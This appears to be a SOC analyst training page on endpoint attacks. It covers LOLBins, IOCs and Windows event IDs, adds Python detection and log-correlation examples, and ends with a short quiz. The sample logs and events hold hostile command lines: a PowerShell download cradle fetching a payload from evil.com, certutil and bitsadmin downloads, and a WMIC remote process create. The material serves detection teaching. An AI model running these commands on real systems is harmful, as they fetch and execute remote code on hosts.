Endpoint Attacks

SOC Analyst Perspective on Host-Based Threats


Endpoint Attack Categories

As a SOC analyst, you'll encounter various attacks targeting endpoints (workstations, servers, mobile devices). Understanding attack patterns helps you identify and respond to threats quickly.

Malware Execution

CRITICAL

Ransomware, trojans, worms executing on host. Look for unusual processes, file encryption activity.

Credential Theft

CRITICAL

Mimikatz, LSASS dumps, keyloggers stealing authentication data from memory or input.

Privilege Escalation

HIGH

Exploits elevating user to admin/SYSTEM. Watch for UAC bypasses, kernel exploits.

Persistence

HIGH

Registry run keys, scheduled tasks, services ensuring malware survives reboot.

Lateral Movement

HIGH

PsExec, WMI, RDP spreading to other hosts. Monitor unusual authentication patterns.

Living Off the Land

MEDIUM

PowerShell, certutil, mshta - legitimate tools used maliciously. Hard to detect.


Indicators of Compromise (IOCs)

SOC analysts use IOCs to identify malicious activity. These are observable artifacts left behind by attackers.

Host-Based IOCs

  • File hashes: known malware MD5/SHA256 signatures
  • File names: suspicious executables (e.g. svchost.exe running from the wrong location)
  • Registry: persistence keys modified (Run, RunOnce, Services)
  • Processes: unusual parent-child relationships (Word spawning PowerShell)
  • Connections: outbound traffic to known C2 IPs/domains

Detection Strategies

Signature-Based

Match known malware hashes and patterns. Fast but misses zero-days and polymorphic threats.

Behavior-Based

Detect anomalous actions: mass file encryption, LSASS access, unusual network patterns.

Heuristic

Rules-based detection using known attack patterns (MITRE ATT&CK techniques).

ML/AI

Machine learning models detecting deviations from baseline behavior profiles.

Living Off the Land (LOLBins)

Attackers increasingly use legitimate system tools instead of custom malware. These "Living Off the Land Binaries" (LOLBins) are already on the system, signed by Microsoft, and bypass most signature-based detection:

  • powershell.exe
      Legitimate purpose: System administration
      Malicious use: Download & execute payloads, encoded commands (-enc)
      Detection: Monitor for -enc, -nop, -w hidden, IEX, Invoke-Expression
  • certutil.exe
      Legitimate purpose: Certificate management
      Malicious use: Download files (-urlcache), decode base64 (-decode)
      Detection: Alert on certutil with -urlcache or -decode flags
  • mshta.exe
      Legitimate purpose: HTML Application host
      Malicious use: Execute remote HTA files containing scripts
      Detection: Monitor for mshta.exe spawning child processes
  • rundll32.exe
      Legitimate purpose: Run DLL functions
      Malicious use: Execute malicious DLLs, bypass application whitelisting
      Detection: Alert on rundll32 loading DLLs from temp/download dirs
  • wmic.exe
      Legitimate purpose: WMI queries
      Malicious use: Remote process creation, lateral movement
      Detection: Monitor for wmic process call create
  • bitsadmin.exe
      Legitimate purpose: Background file transfers
      Malicious use: Download malware via BITS jobs
      Detection: Monitor for bitsadmin /transfer with external URLs

Why LOLBins are dangerous: Antivirus won't flag powershell.exe or certutil.exe — they're Microsoft-signed system binaries. Detection requires behavioral monitoring: what these tools DO matters more than what they ARE. This is why EDR replaced traditional AV in enterprise security.
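The "Detection" column above is easy to turn into process-creation rules. The following Python is an added example, not code from the page, that encodes those six rules and runs them over constructed Event 4688 / Sysmon-style records (the hosts, users, paths and URLs in the sample events are hypothetical). Each rule keys on the image name, the parent name, or a command-line pattern, exactly as the table describes.

```python
import re

# Constructed process-creation records in a simplified 4688/Sysmon field layout.
# Paths, users and URLs are hypothetical sample data, not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc AAAA"},  # AAAA = placeholder base64
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://files.example.invalid/a.txt a.txt"},
    {"image": r"C:\Windows\System32\rundll32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\helper.dll,Start"},
    {"image": r"C:\Windows\System32\wbem\wmic.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'wmic /node:"FILESRV01" process call create "cmd.exe /c whoami"'},
    {"image": r"C:\Windows\System32\bitsadmin.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"bitsadmin /transfer job1 http://files.example.invalid/agent.exe C:\Users\Public\agent.exe"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": "cmd.exe /c start notepad.exe"},
    # Benign administration: same binaries, none of the flagged flags or parents.
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -hashfile C:\installers\setup.msi SHA256"},
]

# (rule name, required image basename, required parent basename, command-line regex);
# None means "don't care". Patterns follow the Detection column of the LOLBin table.
RULES = [
    ("powershell_encoded_or_hidden", "powershell.exe", None,
     re.compile(r"(?i)\s-(?:enc\w*|nop|w\s+hidden)\b|\bIEX\b|Invoke-Expression")),
    ("certutil_download_or_decode", "certutil.exe", None,
     re.compile(r"(?i)\s-(?:urlcache|decode)\b")),
    ("mshta_spawned_child", None, "mshta.exe", None),
    ("rundll32_dll_from_temp", "rundll32.exe", None,
     re.compile(r"(?i)\\(?:temp|downloads)\\[^\s,]*\.dll")),
    ("wmic_remote_process_create", "wmic.exe", None,
     re.compile(r"(?i)\bprocess\s+call\s+create\b")),
    ("bitsadmin_external_transfer", "bitsadmin.exe", None,
     re.compile(r"(?i)/transfer\b.*\bhttps?://")),
]


def basename(path):
    """Lower-cased file name of a Windows path ('C:\\x\\Y.EXE' -> 'y.exe')."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of every rule that fires for one process-creation event."""
    image, parent = basename(event["image"]), basename(event["parent"])
    hits = []
    for name, want_image, want_parent, pattern in RULES:
        if want_image and image != want_image:
            continue
        if want_parent and parent != want_parent:
            continue
        if pattern and not pattern.search(event["cmdline"]):
            continue
        hits.append(name)
    return hits


def triage(events):
    """Map event index -> fired rules, keeping only events that fired something."""
    return {i: hits for i, ev in enumerate(events) if (hits := evaluate(ev))}


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["cmdline"][:60], "->", ", ".join(hits))
```

The two benign records at the end show why the rules key on flags and parents rather than on the binary name alone: the same powershell.exe and certutil.exe run without firing anything. In production the rules would also need tuning for the encoded-command legitimate uses (for example, some deployment tools pass -enc) so that the alert volume stays actionable.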

EDR Alert Categories

Endpoint Detection and Response (EDR) tools generate alerts that SOC analysts triage:

  • Process Injection: Code injected into legitimate process memory
  • Credential Access: Attempts to dump credentials from LSASS or SAM
  • Defense Evasion: Disabling AV, clearing logs, timestomping
  • Command & Control: Beaconing to external servers
  • Data Exfiltration: Large data transfers to unusual destinations

Windows Event Log Analysis

SOC analysts correlate Windows Event IDs to detect endpoint attacks:

Critical Event IDs

  • 4624: Successful logon - check for unusual accounts/times
  • 4625: Failed logon - brute force detection
  • 4688: Process creation - command line auditing
  • 4697: Service installed (Security log) - persistence mechanism
  • 4698: Scheduled task created - persistence
  • 4720: User account created - unauthorized access
  • 7045: New service installed on system (Service Control Manager, System log)
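Correlating these IDs is where they become useful: a burst of 4625 failures for one account from one source is a brute-force signal, a 4624 success for the same pair right after the burst means the guessing likely worked, and a 4697/7045 service whose binary lives in a user-writable directory is a persistence signal. The Python below is an added example (not from the page) that implements those three correlations over constructed events; the threshold, window and user-writable path markers are assumptions you would tune for your environment, and the accounts, hosts and addresses are hypothetical.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed Security/System log events in a simplified field layout
# (hypothetical accounts, sources and services).
SAMPLE_EVENTS = [
    {"time": "2024-01-15 14:30:00", "id": 4625, "account": "svc_backup", "src": "10.0.0.25"},
    {"time": "2024-01-15 14:30:10", "id": 4625, "account": "svc_backup", "src": "10.0.0.25"},
    {"time": "2024-01-15 14:30:20", "id": 4625, "account": "svc_backup", "src": "10.0.0.25"},
    {"time": "2024-01-15 14:30:30", "id": 4625, "account": "svc_backup", "src": "10.0.0.25"},
    {"time": "2024-01-15 14:30:40", "id": 4625, "account": "svc_backup", "src": "10.0.0.25"},
    {"time": "2024-01-15 14:30:50", "id": 4625, "account": "svc_backup", "src": "10.0.0.25"},
    {"time": "2024-01-15 14:31:05", "id": 4624, "account": "svc_backup", "src": "10.0.0.25"},
    {"time": "2024-01-15 14:31:30", "id": 4625, "account": "alice", "src": "10.0.0.7"},  # one typo, not a burst
    {"time": "2024-01-15 14:35:22", "id": 7045, "service": "WindowsUpdateHelper",
     "image_path": r"C:\Users\Public\update.exe"},
    {"time": "2024-01-15 14:40:00", "id": 4697, "service": "Sysmon64",
     "image_path": r"C:\Windows\Sysmon64.exe"},
]

FAIL_THRESHOLD = 5               # assumed: failed logons per (account, source) ...
WINDOW = timedelta(seconds=120)  # ... within this sliding window
# Assumed markers for locations a normal user can write to; a service binary
# there is a classic persistence tell (compare C:\Windows\System32).
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "\\temp\\")


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def correlate(events):
    """Walk events in time order and return a list of (finding, detail) tuples."""
    findings = []
    recent_failures = defaultdict(deque)  # (account, src) -> timestamps of 4625s in window
    for e in sorted(events, key=_ts):
        t = _ts(e)
        window = recent_failures[(e.get("account"), e.get("src"))]
        while window and t - window[0] > WINDOW:
            window.popleft()  # expire failures older than the window
        if e["id"] == 4625:
            window.append(t)
            if len(window) == FAIL_THRESHOLD:  # fire once, when the burst crosses the line
                findings.append(("brute_force", f"{e['account']} from {e['src']}"))
        elif e["id"] == 4624 and len(window) >= FAIL_THRESHOLD:
            # Success immediately after a burst of failures: the guessing probably worked.
            findings.append(("success_after_brute_force", f"{e['account']} from {e['src']}"))
        elif e["id"] in (4697, 7045):
            path = e["image_path"].lower()
            if any(marker in path for marker in USER_WRITABLE):
                findings.append(("service_in_user_writable_path",
                                 f"{e['service']} -> {e['image_path']}"))
    return findings


if __name__ == "__main__":
    for finding, detail in correlate(SAMPLE_EVENTS):
        print(f"{finding}: {detail}")
```

The 4624-after-4625 rule is the one that turns a noisy signal into a priority: five failures alone may be a locked-out user, but a success from the same source inside the window is the event to escalate and the account to reset.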

Suspicious Log Patterns

Identify these patterns in your SIEM when hunting for endpoint attacks:

Example 1: Credential Dumping

2024-01-15 14:32:18 [CRITICAL] lsass.exe
Process Access: mimikatz.exe accessed lsass.exe with PROCESS_VM_READ
Source: WORKSTATION-PC | User: DOMAIN\admin

Example 2: PowerShell Download Cradle

2024-01-15 14:33:45 [WARNING] Event 4688
Process: powershell.exe
Command: IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')
Parent: WINWORD.EXE

Example 3: Persistence via Registry

2024-01-15 14:35:22 [WARNING] Registry Modified
Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: "WindowsUpdate" = "C:\Users\Public\update.exe"
Process: reg.exe
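The three records above share a layout (a timestamped header, then "Key: value" lines, with " | " separating several pairs on one line), so one small parser can feed all three patterns, and the verdicts map directly onto the host-based IOCs listed earlier (parent-child anomaly, registry persistence key). The Python below is an added example, not the page's or any vendor's code: it embeds the three records exactly as printed as its sample input, parses them, and classifies each with the rule the page states for it. The Office application list and the user-writable path markers are assumptions.

```python
import re

# The three records from "Suspicious Log Patterns", embedded as sample input.
# Hostnames, users and the URL are the page's own illustrative values.
SAMPLE_LOG = r"""
2024-01-15 14:32:18 [CRITICAL] lsass.exe
Process Access: mimikatz.exe accessed lsass.exe with PROCESS_VM_READ
Source: WORKSTATION-PC | User: DOMAIN\admin

2024-01-15 14:33:45 [WARNING] Event 4688
Process: powershell.exe
Command: IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')
Parent: WINWORD.EXE

2024-01-15 14:35:22 [WARNING] Registry Modified
Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: "WindowsUpdate" = "C:\Users\Public\update.exe"
Process: reg.exe
"""

HEADER = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) \[(\w+)\] (.+)$")
ACCESS = re.compile(r"^(\S+) accessed (\S+) with (\S+)$")
REG_VALUE = re.compile(r'"([^"]*)"\s*=\s*"([^"]*)"')

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}  # assumed list
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "\\temp\\")           # assumed markers
RUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")


def parse_records(text):
    """Split the log into blank-line-separated records; each becomes a dict of
    lower-cased 'key: value' fields plus the header's time, level and subject."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.strip().splitlines()
        header = HEADER.match(lines[0])
        if not header:
            continue  # not a record header: skip rather than guess
        rec = {"time": header.group(1), "level": header.group(2), "subject": header.group(3)}
        for line in lines[1:]:
            for field in line.split(" | "):
                key, sep, value = field.partition(": ")
                if sep:
                    rec[key.strip().lower()] = value.strip()
        records.append(rec)
    return records


def classify(rec):
    """Map one record to a verdict using the page's three patterns, or None."""
    # 1. Credential dumping: some process reading LSASS memory (PROCESS_VM_READ).
    access = ACCESS.match(rec.get("process access", ""))
    if access and access.group(2).lower() == "lsass.exe" and "PROCESS_VM_READ" in access.group(3):
        return "credential_dumping"
    # 2. Parent-child anomaly: an Office application spawning PowerShell.
    if (rec.get("process", "").lower() == "powershell.exe"
            and rec.get("parent", "").lower() in OFFICE_APPS):
        return "office_spawned_powershell"
    # 3. Persistence: a Run/RunOnce value pointing at a user-writable path.
    key = rec.get("key", "").lower()
    value = REG_VALUE.search(rec.get("value", ""))
    if key.endswith(RUN_KEYS) and value and value.group(2).lower().startswith(USER_WRITABLE):
        return "run_key_persistence"
    return None


def triage(text):
    """Return (time, verdict) for every record that matches one of the patterns."""
    return [(r["time"], verdict) for r in parse_records(text) if (verdict := classify(r))]


if __name__ == "__main__":
    for when, verdict in triage(SAMPLE_LOG):
        print(when, verdict)
```

Note that the first rule keys on the access right and the target, not on the name "mimikatz.exe": renamed tooling still reads LSASS with PROCESS_VM_READ, which is the behaviour-based point made in the Detection Strategies section. In practice this rule needs an allowlist for legitimate LSASS readers such as the EDR agent itself.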

SOC Analyst Response Actions

  • Isolate: Quarantine affected endpoint from network
  • Preserve: Capture memory dump and disk image
  • Investigate: Analyze IOCs, timeline, scope
  • Contain: Block C2 IPs/domains, reset credentials
  • Eradicate: Remove malware, persistence mechanisms
  • Document: Create incident report with findings

Endpoint Attacks Quiz

Test your understanding. You need 80% (4/5) to pass.

Q1. A SOC analyst sees PowerShell.exe spawned by WINWORD.EXE. What type of attack is this?
Brute force attack
SQL injection
Macro-based malware delivery
Denial of service
Q2. Which Windows Event ID indicates a new service was installed?
4624
7045
4625
1102
Q3. Mimikatz accessing lsass.exe is an example of what attack type?
Credential theft
Data exfiltration
Denial of service
Phishing
Q4. An attacker uses certutil.exe to download malware. This technique is called:
Privilege escalation
Lateral movement
Persistence
Living off the land
Q5. Which detection method is BEST for catching zero-day malware?
Signature-based detection
Behavior-based detection
Hash matching
Blocklist filtering
